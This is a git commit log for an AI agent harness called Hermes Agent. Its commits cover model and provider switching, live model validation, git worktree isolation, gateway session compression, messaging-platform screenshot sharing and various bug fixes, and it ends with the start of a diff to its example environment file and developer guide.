2026-03-08 06:13:12 -07:00
stablegenius49
d07d867718 Fix empty tool selection persistence 2026-03-08 06:11:18 -07:00
teknium1
666f2dd486 feat: /provider command + fix gateway bugs + harden parse_model_input
/provider command (CLI + gateway):
  Shows all providers with auth status (✓/✗), aliases, and active marker.
  Users can now discover what provider names work with provider:model syntax.

Gateway bugs fixed:
  - Config was saved even when validation.persist=False (told user 'session
    only' but actually persisted the unvalidated model)
  - HERMES_INFERENCE_PROVIDER env var not set on provider switch, causing
    the switch to be silently overridden if that env var was already set

parse_model_input hardened:
  - Colon only treated as provider delimiter if left side is a recognized
    provider name or alias. 'anthropic/claude-3.5-sonnet:beta' now passes
    through as a model name instead of trying provider='anthropic/claude-3.5-sonnet'.
  - HTTP URLs, random colons no longer misinterpreted.

56 tests passing across model validation, CLI commands, and integration.
2026-03-08 06:09:36 -07:00
teknium1
34792dd907 fix: resolve 'auto' provider properly via credential detection
'auto' doesn't always mean openrouter — it could be nous, zai,
kimi-coding, etc. depending on configured credentials. Reverted the
hardcoded mapping and now both CLI and gateway call
resolve_provider() to detect the actual active provider when 'auto'
is set. Falls back to openrouter only if resolution fails.
2026-03-08 05:58:45 -07:00
teknium1
7ad6fc8a40 fix: gateway /model also needs normalize_provider for 'auto' resolution 2026-03-08 05:56:43 -07:00
teknium1
f824c10429 feat: enhance config migration with new environment variable tracking
Added a system to track environment variables introduced in each config version, allowing migration prompts to only mention new variables since the user's last version. Updated the interactive configuration process to offer users the option to set these new optional keys during migration.
2026-03-08 05:55:32 -07:00
teknium1
132e5ec179 fix: resolve 'auto' provider in /model display + update gateway handler
- normalize_provider('auto') now returns 'openrouter' (the default)
  so /model shows the curated model list instead of nothing
- CLI /model display uses normalize_provider before looking up labels
- Gateway /model handler now uses the same validation logic as CLI:
  live API probe, provider:model syntax, curated model list display
2026-03-08 05:54:52 -07:00
teknium1
66d3e6a0c2 feat: provider switching via /model + enhanced model display
Add provider:model syntax to /model command for runtime provider switching:
  /model zai:glm-5           → switch to Z.AI provider with glm-5
  /model nous:hermes-3       → switch to Nous Portal with hermes-3
  /model openrouter:anthropic/claude-sonnet-4.5  → explicit OpenRouter

When switching providers, credentials are resolved via resolve_runtime_provider
and validated before committing. Both model and provider are saved to config.
Provider aliases work (glm: → zai, kimi: → kimi-coding, etc.).

Enhanced /model (no args) display now shows:
  - Current model and provider
  - Curated model list for the current provider with ← marker
  - Usage examples including provider:model syntax

39 tests covering parse_model_input, curated_models_for_provider,
provider switching (success + credential failure), and display output.
2026-03-08 05:45:59 -07:00
teknium1
4a09ae2985 chore: remove dead module stubs from test_cli_init.py
The 200 lines of prompt_toolkit/rich/fire stubs added in PR #650 were
guarded by 'if module in sys.modules: return' and never activated since
those dependencies are always installed. Removed to keep the test file
lean. Also removed unused MagicMock and pytest imports.
2026-03-08 05:35:02 -07:00
teknium1
8c734f2f27 fix: remove OpenRouter '/' format enforcement — let API probe be the authority
Not all providers require 'provider/model' format. Removing the rigid
format check lets the live API probe handle all validation uniformly.
If someone types 'gpt-5.4' on OpenRouter, the probe won't find it and
will suggest 'openai/gpt-5.4' — better UX than a format rejection.
2026-03-08 05:31:41 -07:00
teknium1
245d174359 feat: validate /model against live API instead of hardcoded lists
Replace the static catalog-based model validation with a live API probe.
The /model command now hits the provider's /models endpoint to check if
the requested model actually exists:

- Model found in API → accepted + saved to config
- Model NOT found in API → rejected with 'Error: not a valid model'
  and fuzzy-match suggestions from the live model list
- API unreachable → graceful fallback to hardcoded catalog (session-only
  for unrecognized models)
- Format errors (empty, spaces, missing '/') still caught instantly
  without a network call

The API probe takes ~0.2s for OpenRouter (346 models) and works with any
OpenAI-compatible endpoint (Ollama, vLLM, custom, etc.).

32 tests covering all paths: format checks, API found, API not found,
API unreachable fallback, CLI integration.
2026-03-08 05:22:20 -07:00
stablegenius49
77f47768dd fix: improve /history message display 2026-03-08 05:08:57 -07:00
teknium1
90fa9e54ca fix: guard validate_requested_model + expand test coverage (PR #649 follow-up)
- Wrap validate_requested_model in try/except so /model doesn't crash
  if validation itself fails (falls back to old accept+save behavior)
- Remove unnecessary sys.path.insert from both test files
- Expand test_model_validation.py: 4 → 23 tests covering normalize_provider,
  provider_model_ids, empty/whitespace/spaces rejection, OpenRouter format
  validation, custom endpoints, nous provider, provider aliases, unknown
  providers, fuzzy suggestions
- Expand test_cli_model_command.py: 2 → 5 tests adding known-model save,
  validation crash fallback, and /model with no argument
2026-03-08 04:47:35 -07:00
stablegenius49
9d3a44e0e8 fix: validate /model values before saving 2026-03-08 04:47:35 -07:00
teknium1
932d596466 feat: enhance systemd unit and install script for browser dependencies
Updated the systemd unit generation to include the virtual environment and node modules in the PATH, improving the execution context for the hermes CLI. Additionally, added support for installing Playwright and its dependencies on Arch/Manjaro systems in the install script, ensuring a smoother setup process for browser tools.
2026-03-08 04:36:23 -07:00
teknium1
d518f40e8b fix: improve browser command environment setup
Enhanced the environment setup for browser commands by ensuring the PATH variable includes standard directories, addressing potential issues with minimal PATH in systemd services. Additionally, updated the logging of stderr to use a warning level on failure for better visibility of errors. This change improves the robustness of subprocess execution in the browser tool.
2026-03-08 04:08:44 -07:00
Teknium
f016cfca46 Merge pull request #685 from NousResearch/revert-659-feat/skill-prerequisites
Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies"
2026-03-08 03:58:41 -07:00
Teknium
b8120df860 Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies" 2026-03-08 03:58:13 -07:00
teknium1
0df7df52f3 test: expand slash command autocomplete coverage (PR #645 follow-up)
- Fix failing test: use display_text/display_meta_text instead of str()
  on prompt_toolkit FormattedText objects
- Add regression guard: EXPECTED_COMMANDS set ensures no command
  silently disappears from the shared dict
- Add edge case tests: non-slash input, empty input, partial vs exact
  match trailing space, builtin display_meta content
- Add skill provider tests: None provider, exception swallowing,
  description truncation at 50 chars, missing description fallback,
  exact-match trailing space on skill commands
- Total: 15 tests (up from 4)
2026-03-08 03:53:22 -07:00
stablegenius49
bfa27d0a68 fix(cli): unify slash command autocomplete registry 2026-03-08 03:53:22 -07:00
teknium1
5a20c486e3 Merge PR #659: feat: skill prerequisites — hide skills with unmet runtime dependencies
Authored by kshitijk4poor. Fixes #630.
2026-03-08 03:12:35 -07:00
teknium1
78e19ebc95 chore: update .gitignore to include .worktrees directory
Added .worktrees to the .gitignore file to prevent tracking of worktree-specific files, ensuring a cleaner repository.
2026-03-08 03:01:46 -07:00
teknium1
b383cafc44 refactor: rename and enhance shell detection in local environment
Renamed _find_shell to _find_bash to clarify its purpose of specifically locating bash. Improved the shell detection logic to prioritize bash over the user's $SHELL, ensuring compatibility with the fence wrapper's syntax requirements. Added a backward compatibility alias for _find_shell to maintain existing imports in process_registry.py.
2026-03-08 03:00:05 -07:00
teknium1
b10ff83566 fix: enhance PATH handling in local environment
Updated the LocalEnvironment class to ensure the PATH variable includes standard directories. This change addresses issues with systemd services and terminal multiplexers that inherit a minimal PATH, improving the execution environment for subprocesses.
2026-03-08 01:50:38 -08:00
teknium1
daa1f542f9 fix: enhance shell detection in local environment configuration
Updated the _find_shell function to improve shell detection on non-Windows systems. The function now checks for the existence of /usr/bin/bash and /bin/bash before falling back to /bin/sh, ensuring a more robust shell resolution process.
2026-03-08 01:43:00 -08:00
teknium1
d507f593d0 fix: respect config.yaml cwd in gateway, add sandbox_dir config option
Two fixes:

1. Gateway CWD override: TERMINAL_CWD from config.yaml was being
   unconditionally overwritten by the messaging_cwd fallback (line 114).
   Now explicit paths in config.yaml are respected — only '.' / 'auto' /
   'cwd' (or unset) fall back to MESSAGING_CWD or home directory.

2. sandbox_dir config: Added terminal.sandbox_dir to config.yaml bridge
   in gateway/run.py, cli.py, and hermes_cli/config.py. Maps to
   TERMINAL_SANDBOX_DIR env var, which get_sandbox_dir() reads to
   determine where Docker/Singularity sandbox data is stored (default:
   ~/.hermes/sandboxes/). Users can now set:
     hermes config set terminal.sandbox_dir /data/hermes-sandboxes
2026-03-08 01:33:46 -08:00
kshitij
f210510276 feat: add prerequisites field to skill spec — hide skills with unmet dependencies
Skills can now declare runtime prerequisites (env vars, CLI binaries) via
YAML frontmatter. Skills with unmet prerequisites are excluded from the
system prompt so the agent never claims capabilities it can't deliver, and
skill_view() warns the agent about what's missing.

Three layers of defense:
- build_skills_system_prompt() filters out unavailable skills
- _find_all_skills() flags unmet prerequisites in metadata
- skill_view() returns prerequisites_warning with actionable details

Tagged 12 bundled skills that have hard runtime dependencies:
gif-search (TENOR_API_KEY), notion (NOTION_API_KEY), himalaya, imessage,
apple-notes, apple-reminders, openhue, duckduckgo-search, codebase-inspection,
blogwatcher, songsee, mcporter.

Closes #658
Fixes #630
2026-03-08 13:19:32 +05:30
teknium1
19b6f81ee7 fix: allow Anthropic API URLs as custom OpenAI-compatible endpoints
Removed the hard block on base_url containing 'api.anthropic.com'.
Anthropic now offers an OpenAI-compatible /chat/completions endpoint,
so blocking their URL prevents legitimate use. If the endpoint isn't
compatible, the API call will fail with a proper error anyway.

Removed from: run_agent.py, mini_swe_runner.py
Updated test to verify Anthropic URLs are accepted.
2026-03-07 23:36:35 -08:00
Teknium
76545ab365 Merge pull request #657 from NousResearch/feat/browser-screenshot-sharing
feat: browser screenshot sharing via MEDIA: on all messaging platforms
2026-03-07 22:57:42 -08:00
teknium1
b8c3bc7841 feat: browser screenshot sharing via MEDIA: on all messaging platforms
browser_vision now saves screenshots persistently to ~/.hermes/browser_screenshots/
and returns the screenshot_path in its JSON response. The model can include
MEDIA:<path> in its response to share screenshots as native photos.

Changes:
- browser_tool.py: Save screenshots persistently, return screenshot_path,
  auto-cleanup files older than 24 hours, mkdir moved inside try/except
- telegram.py: Add send_image_file() — sends local images via bot.send_photo()
- discord.py: Add send_image_file() — sends local images via discord.File
- slack.py: Add send_image_file() — sends local images via files_upload_v2()
  (WhatsApp already had send_image_file — no changes needed)
- prompt_builder.py: Updated Telegram hint to list image extensions,
  added Discord and Slack MEDIA: platform hints
- browser.md: Document screenshot sharing and 24h cleanup
- send_file_integration_map.md: Updated to reflect send_image_file is now
  implemented on Telegram/Discord/Slack
- test_send_image_file.py: 19 tests covering MEDIA: .png extraction,
  send_image_file on all platforms, and screenshot cleanup

Partially addresses #466 (Phase 0: platform adapter gaps for send_image_file).
2026-03-07 22:57:05 -08:00
teknium1
a680367568 fix tmux menus 2026-03-07 22:14:21 -08:00
teknium1
dfd37a4b31 Merge PR #635: fix: add Kimi Code API support (api.kimi.com/coding/v1)
Authored by christomitov. Auto-detects sk-kimi- key prefix and routes
to api.kimi.com/coding/v1. Adds User-Agent header for Kimi Code API
compatibility. Legacy Moonshot keys continue to work unchanged.
2026-03-07 21:45:27 -08:00
teknium1
5ee9b67d9b Merge PR #654: feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Adds --worktree (-w) flag to hermes CLI for isolated git worktree sessions.
Multiple agents can work on the same repo concurrently without collisions.

Closes #652
2026-03-07 21:38:42 -08:00
teknium1
542faf225f Fix Telegram image delivery for large (>5MB) images
Telegram's send_photo via URL has a ~5MB limit. Upscaled images from
fal.ai's Clarity Upscaler often exceed this, causing 'Wrong type of
web page content' or 'Failed to get http url content' errors.

Fix: Add download-and-upload fallback in Telegram's send_image().
When URL-based send_photo fails, download the image via httpx and
re-upload as bytes (supports up to 10MB file uploads).

Also: convert print() to logger.warning/error in image sending path
for proper log visibility (print goes to socket, invisible in logs).
2026-03-07 21:29:45 -08:00
teknium1
5684c68121 Add logger.info/error for image extraction and delivery debugging 2026-03-07 21:24:47 -08:00
teknium1
4be783446a fix: wire worktree flag into hermes CLI entry point + docs + tests
Critical fixes:
- Add --worktree/-w to hermes_cli/main.py argparse (both chat
  subcommand and top-level parser) so 'hermes -w' works via the
  actual CLI entry point, not just 'python cli.py -w'
- Pass worktree flag through cmd_chat() kwargs to cli_main()
- Handle worktree attr in bare 'hermes' and --resume/--continue paths

Bug fixes in cli.py:
- Skip worktree creation for --list-tools/--list-toolsets (wasteful)
- Wrap git worktree subprocess.run in try/except (crash on timeout)
- Add stale worktree pruning on startup (_prune_stale_worktrees):
  removes clean worktrees older than 24h left by crashed/killed sessions

Documentation updates:
- AGENTS.md: add --worktree to CLI commands table
- cli-config.yaml.example: add worktree config section
- website/docs/reference/cli-commands.md: add to core commands
- website/docs/user-guide/cli.md: add usage examples
- website/docs/user-guide/configuration.md: add config docs

Test improvements (17 → 31 tests):
- Stale worktree pruning (prune old clean, keep recent, keep dirty)
- Directory symlink via .worktreeinclude
- Edge cases (no commits, not a repo, pre-existing .worktrees/)
- CLI flag/config OR logic
- TERMINAL_CWD integration
- System prompt injection format
2026-03-07 21:05:40 -08:00
teknium1
8d719b180a feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Add a --worktree (-w) flag to the hermes CLI that creates an isolated
git worktree for the session. This allows running multiple hermes-agent
instances concurrently on the same repo without file collisions.

How it works:
- On startup with -w: detects git repo, creates .worktrees/<session>/
  with its own branch (hermes/<session-id>), sets TERMINAL_CWD to it
- Each agent works in complete isolation — independent HEAD, index,
  and working tree, shared git object store
- On exit: auto-removes worktree and branch if clean, warns and
  keeps if there are uncommitted changes
- .worktreeinclude file support: list gitignored files (.env, .venv/)
  to auto-copy/symlink into new worktrees
- .worktrees/ is auto-added to .gitignore
- Agent gets a system prompt note about the worktree context
- Config support: set worktree: true in config.yaml to always enable

Usage:
  hermes -w                      # Interactive mode in worktree
  hermes -w -q "Fix issue #123"  # Single query in worktree
  # Or in config.yaml:
  worktree: true

Includes 17 tests covering: repo detection, worktree creation,
independence verification, cleanup (clean/dirty), .worktreeinclude,
.gitignore management, and 10 concurrent worktrees.

Closes #652
2026-03-07 20:51:08 -08:00
teknium1
bf048c8aec feat: add qmd optional skill — local knowledge base search
Add official optional skill for qmd (tobi/qmd), a local on-device
search engine for personal knowledge bases, notes, docs, and meeting
transcripts.

Covers:
- Installation and setup for macOS and Linux
- Collection management and context annotations
- All search modes: BM25, vector, hybrid with reranking
- MCP integration (stdio and HTTP daemon modes)
- Structured query patterns and best practices
- systemd/launchd service configs for daemon persistence

Placed in optional-skills/ due to heavyweight requirements
(Node >= 22, ~2GB local models).
2026-03-07 20:39:05 -08:00
teknium1
c5a9d1ef9d Merge branch 'main' into pr-635 2026-03-07 20:36:42 -08:00
teknium1
c7b6f423c7 feat: auto-compress pathologically large gateway sessions (#628)
Long-lived gateway sessions can accumulate enough history that every new
message rehydrates an oversized transcript, causing repeated truncation
failures (finish_reason=length).

Add a session hygiene check in _handle_message that runs right after
loading the transcript and before invoking the agent:

1. Estimate message count and rough token count of the transcript
2. If above configurable thresholds (default: 200 msgs or 100K tokens),
   auto-compress the transcript proactively
3. Notify the user about the compression with before/after stats
4. If still above warn threshold (default: 200K tokens) after
   compression, suggest /reset
5. If compression fails on a dangerously large session, warn the user
   to use /compress or /reset manually

Thresholds are configurable via config.yaml:

  session_hygiene:
    auto_compress_tokens: 100000
    auto_compress_messages: 200
    warn_tokens: 200000

This complements the agent's existing preflight compression (which
runs inside run_conversation) by catching pathological sessions at
the gateway layer before the agent is even created.

Includes 12 tests for threshold detection and token estimation.
2026-03-07 20:09:48 -08:00
teknium1
6d34207167 Merge PR #620: fix: restore missing MIT license file
Authored by stablegenius49. Fixes #619.
2026-03-07 20:00:33 -08:00
Bryan Young
fcde9be10d fix: keep tool-call output runs intact during compression 2026-03-08 03:13:14 +00:00
teknium1
3830bbda41 fix: include url in web_extract trimmed results & fix docs
The web_extract_tool was stripping the 'url' key during its output
trimming step, but documentation in 3 places claimed it was present.
This caused KeyError when accessing result['url'] in execute_code
scripts, especially when extracting from multiple URLs.

Changes:
- web_tools.py: Add 'url' back to trimmed_results output
- code_execution_tool.py: Add 'title' to _TOOL_STUBS docstring and
  _TOOL_DOC_LINES so docs match actual {url, title, content, error}
  response format
2026-03-07 18:07:36 -08:00
Christo Mitov
4447e7d71a fix: add Kimi Code API support (api.kimi.com/coding/v1)
Kimi Code (platform.kimi.ai) issues API keys prefixed sk-kimi- that require:
1. A different base URL: api.kimi.com/coding/v1 (not api.moonshot.ai/v1)
2. A User-Agent header identifying a recognized coding agent

Without this fix, sk-kimi- keys fail with 401 (wrong endpoint) or 403
('only available for Coding Agents') errors.

Changes:
- Auto-detect sk-kimi- key prefix and route to api.kimi.com/coding/v1
- Send User-Agent: KimiCLI/1.0 header for Kimi Code endpoints
- Legacy Moonshot keys (api.moonshot.ai) continue to work unchanged
- KIMI_BASE_URL env var override still takes priority over auto-detection
- Updated .env.example with correct docs and all endpoint options
- Fixed doctor.py health check for Kimi Code keys

Reference: https://github.com/MoonshotAI/kimi-cli (platforms.py)
2026-03-07 21:00:12 -05:00
teknium1
7bccd904c7 Merge PR #629: feat: add Polymarket prediction market skill (read-only)
Adds market-data/polymarket skill — read-only access to Polymarket's public
prediction market APIs. Zero dependencies, zero auth required.
Addresses #589.
2026-03-07 17:28:03 -08:00
teknium1
313d522b61 feat: add Polymarket prediction market skill (read-only)
Adds a new market-data/polymarket skill for querying Polymarket's public
prediction market APIs. Pure read-only, zero authentication required,
zero external dependencies (stdlib only).

Includes:
- SKILL.md: Agent instructions with key concepts and workflow
- references/api-endpoints.md: Full API reference (Gamma, CLOB, Data APIs)
- scripts/polymarket.py: CLI helper for search, trending, prices, orderbooks,
  price history, and recent trades

Addresses #589.
2026-03-07 17:27:29 -08:00
teknium1
9ee4fe41fe Fix image_generate 'Event loop is closed' in gateway
Root cause: fal_client.AsyncClient uses @cached_property for its
httpx.AsyncClient, creating it once and caching forever. In the gateway,
the agent runs in a thread pool where _run_async() calls asyncio.run()
which creates a temporary event loop. The first call works, but
asyncio.run() closes that loop. On the next call, a new loop is created
but the cached httpx.AsyncClient still references the old closed loop,
causing 'Event loop is closed'.

Fix: Switch from async fal_client API (submit_async/handler.get with
await) to sync API (submit/handler.get). The sync API uses httpx.Client
which has no event loop dependency. Since the tool already runs in a
thread pool via the gateway, async adds no benefit here.

Changes:
- image_generate_tool: async def -> def
- _upscale_image: async def -> def
- fal_client.submit_async -> fal_client.submit
- await handler.get() -> handler.get()
- is_async=True -> is_async=False in registry
- Remove unused asyncio import
2026-03-07 16:56:49 -08:00
teknium1
39ee3512cb Merge PR #614: fix: resolve systemd restart loop with --replace flag
Authored by voidborne-d. Fixes #576.

Adds --replace flag to 'hermes gateway run' that terminates any existing
gateway instance (SIGTERM with SIGKILL fallback) before starting.
Updated systemd unit template with --replace, ExecStop, KillMode, and
TimeoutStopSec for robust service management.
2026-03-07 16:33:27 -08:00
teknium1
42673556af Merge PR #575: fix(setup): prevent OpenRouter model list fallback for Nous provider
Authored by PercyDikec. Fixes #574.

# Conflicts:
#	hermes_cli/setup.py
2026-03-07 16:22:13 -08:00
teknium1
faab73ad58 Merge PR #573: fix(doctor): detect OpenAI custom endpoint env settings
Authored by stablegenius49. Fixes #572.
2026-03-07 16:16:08 -08:00
teknium1
7e36468511 fix: /clear command broken inside TUI (patch_stdout interference)
The /clear command was using Rich's console.clear() and console.print()
which write directly to stdout. Inside the TUI, prompt_toolkit's
patch_stdout intercepts stdout via StdoutProxy, which doesn't interpret
screen-clearing escape sequences and mangles Rich's ANSI output,
resulting in raw escape codes dumped to the terminal.

Fix:
- Use prompt_toolkit's output.erase_screen() + cursor_goto() to clear
  the terminal directly (bypasses patch_stdout's StdoutProxy)
- Render the banner through ChatConsole (which routes Rich output
  through prompt_toolkit's native print_formatted_text/ANSI renderer)
- Use _cprint for the status message (prompt_toolkit-compatible)
- Fall back to the old behavior when not inside the TUI (e.g. startup)
2026-03-07 16:09:23 -08:00
stablegenius49
9ba5d399e5 fix: restore missing MIT license file 2026-03-07 13:43:08 -08:00
teknium1
306d92a9d7 refactor(context_compressor): improve summary generation logic and error handling
Updated the _generate_summary method to attempt summary generation using the auxiliary model first, with a fallback to the main model. If both attempts fail, the method now returns None instead of a placeholder, allowing the caller to handle missing summaries appropriately. This change enhances the robustness of context compression and improves logging for failure scenarios.
2026-03-07 11:54:51 -08:00
teknium1
5baae0df88 feat(scheduler): enhance job configuration with reasoning effort, prefill messages, and provider routing
Added support for loading reasoning configuration, prefill messages, and provider routing from environment variables or config.yaml in the run_job function. This improves flexibility and customization for job execution, allowing for better control over agent behavior and message handling.
2026-03-07 11:37:16 -08:00
teknium1
24f6a193e7 fix: remove stale 'model' assertion from delegate_task schema test
The 'model' property was removed from DELEGATE_TASK_SCHEMA but the
test still asserted its presence, causing CI to fail.
2026-03-07 11:29:55 -08:00
teknium1
8c0f8baf32 feat(delegate_tool): add additional parameters for child agent configuration
Enhanced the _run_single_child function by introducing max_tokens, reasoning_config, and prefill_messages parameters from the parent agent. This allows for more flexible configuration of child agents, improving their operational capabilities.
2026-03-07 11:29:17 -08:00
teknium1
d80c30cc92 feat(gateway): proactive async memory flush on session expiry
Previously, when a session expired (idle/daily reset), the memory flush
ran synchronously inside get_or_create_session — blocking the user's
message for 10-60s while an LLM call saved memories.

Now a background watcher task (_session_expiry_watcher) runs every 5 min,
detects expired sessions, and flushes memories proactively in a thread
pool.  By the time the user sends their next message, memories are
already saved and the response is immediate.

Changes:
- Add _is_session_expired(entry) to SessionStore — works from entry
  alone without needing a SessionSource
- Add _pre_flushed_sessions set to track already-flushed sessions
- Remove sync _on_auto_reset callback from get_or_create_session
- Refactor flush into _flush_memories_for_session (sync worker) +
  _async_flush_memories (thread pool wrapper)
- Add _session_expiry_watcher background task, started in start()
- Simplify /reset command to use shared fire-and-forget flush
- Add 10 tests for expiry detection, callback removal, tracking
2026-03-07 11:27:50 -08:00
teknium1
e64d646bad Critical: fix bug in new subagent tool call budget to not be session-level but tool call loop level 2026-03-07 10:32:51 -08:00
teknium1
b84f9e410c feat: default reasoning effort from xhigh to medium
Reduces token usage and latency for most tasks by defaulting to
medium reasoning effort instead of xhigh. Users can still override
via config or CLI flag. Updates code, tests, example config, and docs.
2026-03-07 10:14:19 -08:00
d 🔹
ee5daba061 fix: resolve systemd restart loop with --replace flag (#576)
When running under systemd, the gateway could enter restart loops in two
scenarios:

1. The previous gateway process hasn't fully exited when systemd starts
   a new one, causing 'Gateway already running (PID ...)' → exit 1 →
   restart → same error → infinite loop.

2. The interactive CLI exits immediately in non-TTY mode, and systemd
   keeps restarting it.

Changes:

- Add --replace flag to 'hermes gateway run' that gracefully kills any
  existing gateway instance (SIGTERM → wait 10s → SIGKILL) before
  starting, preventing the PID-lock deadlock.

- Update the generated systemd unit template to use --replace by default,
  add ExecStop for clean shutdown, set KillMode=mixed and
  TimeoutStopSec=15 for proper process management.

- Existing behavior (without --replace) is unchanged: still prints the
  error message and exits, now also mentioning the --replace option.

Fixes #576
2026-03-07 18:08:12 +00:00
teknium1
23e84de830 refactor: remove model parameter from AIAgent initialization
Eliminated the model parameter from the AIAgent class initialization, streamlining the constructor and ensuring consistent behavior across agent instances. This change aligns with recent updates to the task delegation logic.
2026-03-07 09:48:19 -08:00
teknium1
48e0dc8791 feat: implement Z.AI endpoint detection for API key validation
Added functionality to detect the appropriate Z.AI endpoint based on the provided API key, accommodating different billing plans and regions. The setup process now probes available endpoints and updates the configuration accordingly, enhancing user experience and reducing potential billing errors. Updated the setup model provider function to integrate this new detection logic.
2026-03-07 09:43:37 -08:00
teknium1
fb0f579b16 refactor: remove model parameter from delegate_task function
Eliminated the model parameter from the delegate_task function and its associated schema, defaulting to None for subagent calls. This change simplifies the function signature and enforces consistent behavior across task delegation.
2026-03-07 09:20:27 -08:00
teknium1
5a711f32b1 fix: enhance payload and context compression handling
Added logic to manage multiple compression attempts for large payloads and context length errors. Introduced limits on compression attempts to prevent infinite retries, with appropriate logging and error handling. This ensures better resilience and user feedback when facing compression issues during API calls.
2026-03-07 09:19:07 -08:00
teknium1
4d34427cc7 fix: update model version in agent configurations
Updated the default model version from "anthropic/claude-sonnet-4-20250514" to "anthropic/claude-sonnet-4.6" across multiple files including AGENTS.md, batch_runner.py, mini_swe_runner.py, and run_agent.py for consistency and to reflect the latest model improvements.
2026-03-07 09:06:37 -08:00
teknium1
41877183bc Merge PR #604: fix(tests): isolate max_turns tests from CI env and update default to 90
Authored by 0xbyt4. Fixes test assertions broken by 0a82396 (60→90 default).
2026-03-07 08:57:36 -08:00
0xbyt4
451a007fb1 fix(tests): isolate max_turns tests from CI env and update default to 90
_make_cli() did not clear HERMES_MAX_ITERATIONS env var, so tests
failed in CI where the var was set externally. Also, default max_turns
changed from 60 to 90 in 0a82396 but tests were not updated.

- Clear HERMES_MAX_ITERATIONS in _make_cli() for proper isolation
- Add env_overrides parameter for tests that need specific env values
- Update hardcoded 60 assertions to 90 to match new default
- Simplify test_env_var_max_turns using env_overrides
2026-03-07 19:43:20 +03:00
PercyDikec
8bf28e1441 fix(setup): prevent OpenRouter model list fallback for Nous provider
When `fetch_nous_models()` fails silently during setup, the model
selection falls through to the OpenRouter static list. Users then pick
models in OpenRouter format (e.g. `anthropic/claude-opus-4.6`) which
the Nous inference API rejects with a 400 "missing model" error.

Add an explicit `elif selected_provider == "nous"` branch that prompts
for manual model entry instead of falling through to the generic
OpenRouter fallback.
2026-03-07 07:16:22 +03:00
stablegenius49
5609117882 fix(doctor): recognize OPENAI_API_KEY custom endpoint config 2026-03-06 19:47:09 -08:00
Vicaversa
f90a627f9a fix(gateway): add missing UTF-8 encoding to file I/O preventing crashes on Windows
On Windows, Python's open() defaults to the system locale encoding
(e.g. cp1254 for Turkish, cp1252 for Western European) instead of
UTF-8. The gateway already uses ensure_ascii=False in json.dumps()
to preserve Unicode characters in chat messages, but the
corresponding open() calls lack encoding="utf-8". This mismatch
causes UnicodeEncodeError / UnicodeDecodeError when users send
non-ASCII messages (Turkish, Japanese, Arabic, emoji, etc.) through
Telegram, Discord, WhatsApp, or Slack on Windows.

The project already fixed this for .env files in hermes_cli/config.py
(line 624) but the gateway module was missed.

Files fixed:
- gateway/session.py: session index + JSONL transcript read/write (5 calls)
- gateway/channel_directory.py: channel directory read/write (3 calls)
- gateway/mirror.py: session index read + transcript append (2 calls)
2026-03-04 11:32:57 +03:00
teyrebaz33
6a51fd23df feat: add AgentMail skill for agent-owned email inboxes (#329) 2026-03-03 22:20:35 +03:00
gizdusum
ec97f9ad1a feat(skills): add Solana blockchain skill (converted from tool) 2026-02-28 23:39:39 +03:00
349 changed files with 21368 additions and 3102 deletions

View File

@@ -24,10 +24,14 @@ GLM_API_KEY=
# =============================================================================
# LLM PROVIDER (Kimi / Moonshot)
# =============================================================================
# Kimi/Moonshot provides access to Moonshot AI coding models
# Get your key at: https://platform.moonshot.ai
# Kimi Code provides access to Moonshot AI coding models (kimi-k2.5, etc.)
# Get your key at: https://platform.kimi.ai (Kimi Code console)
# Keys prefixed sk-kimi- use the Kimi Code API (api.kimi.com) by default.
# Legacy keys from platform.moonshot.ai need KIMI_BASE_URL override below.
KIMI_API_KEY=
# KIMI_BASE_URL=https://api.moonshot.ai/v1 # Override default base URL
# KIMI_BASE_URL=https://api.kimi.com/coding/v1 # Default for sk-kimi- keys
# KIMI_BASE_URL=https://api.moonshot.ai/v1 # For legacy Moonshot keys
# KIMI_BASE_URL=https://api.moonshot.cn/v1 # For Moonshot China keys
# =============================================================================
# LLM PROVIDER (MiniMax)
@@ -49,10 +53,6 @@ MINIMAX_CN_API_KEY=
# Get at: https://firecrawl.dev/
FIRECRAWL_API_KEY=
# Nous Research API Key - Vision analysis and multi-model reasoning
# Get at: https://inference-api.nousresearch.com/
NOUS_API_KEY=
# FAL.ai API Key - Image generation
# Get at: https://fal.ai/
FAL_KEY=

3
.gitignore vendored
View File

@@ -47,4 +47,5 @@ cli-config.yaml
# Skills Hub state (lives in ~/.hermes/skills/.hub/ at runtime, but just in case)
skills/.hub/
ignored/
ignored/
.worktrees/

734
AGENTS.md
View File

@@ -1,78 +1,60 @@
# Hermes Agent - Development Guide
Instructions for AI coding assistants (GitHub Copilot, Cursor, etc.) and human developers.
Hermes Agent is an AI agent harness with tool-calling capabilities, interactive CLI, messaging integrations, and scheduled tasks.
Instructions for AI coding assistants and developers working on the hermes-agent codebase.
## Development Environment
**IMPORTANT**: Always use the virtual environment if it exists:
```bash
source venv/bin/activate # Before running any Python commands
source .venv/bin/activate # ALWAYS activate before running Python
```
## Project Structure
```
hermes-agent/
├── agent/ # Agent internals (extracted from run_agent.py)
├── model_metadata.py # Model context lengths, token estimation
├── run_agent.py # AIAgent class — core conversation loop
├── model_tools.py # Tool orchestration, _discover_tools(), handle_function_call()
├── toolsets.py # Toolset definitions, _HERMES_CORE_TOOLS list
├── cli.py # HermesCLI class — interactive CLI orchestrator
├── hermes_state.py # SessionDB — SQLite session store (FTS5 search)
├── agent/ # Agent internals
│ ├── prompt_builder.py # System prompt assembly
│ ├── context_compressor.py # Auto context compression
│ ├── prompt_caching.py # Anthropic prompt caching
│ ├── prompt_builder.py # System prompt assembly (identity, skills index, context files)
│ ├── auxiliary_client.py # Auxiliary LLM client (vision, summarization)
│ ├── model_metadata.py # Model context lengths, token estimation
│ ├── display.py # KawaiiSpinner, tool preview formatting
│ ├── skill_commands.py # Skill slash commands (shared CLI/gateway)
│ └── trajectory.py # Trajectory saving helpers
├── hermes_cli/ # CLI implementation
│ ├── main.py # Entry point, command dispatcher
│ ├── banner.py # Welcome banner, ASCII art, skills summary
│ ├── commands.py # Slash command definitions + autocomplete
│ ├── callbacks.py # Interactive prompt callbacks (clarify, sudo, approval)
── setup.py # Interactive setup wizard
│ ├── config.py # Config management & migration
│ ├── status.py # Status display
│ ├── doctor.py # Diagnostics
│ ├── gateway.py # Gateway management
│ ├── uninstall.py # Uninstaller
│ ├── cron.py # Cron job management
── skills_hub.py # Skills Hub CLI + /skills slash command
├── tools/ # Tool implementations
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
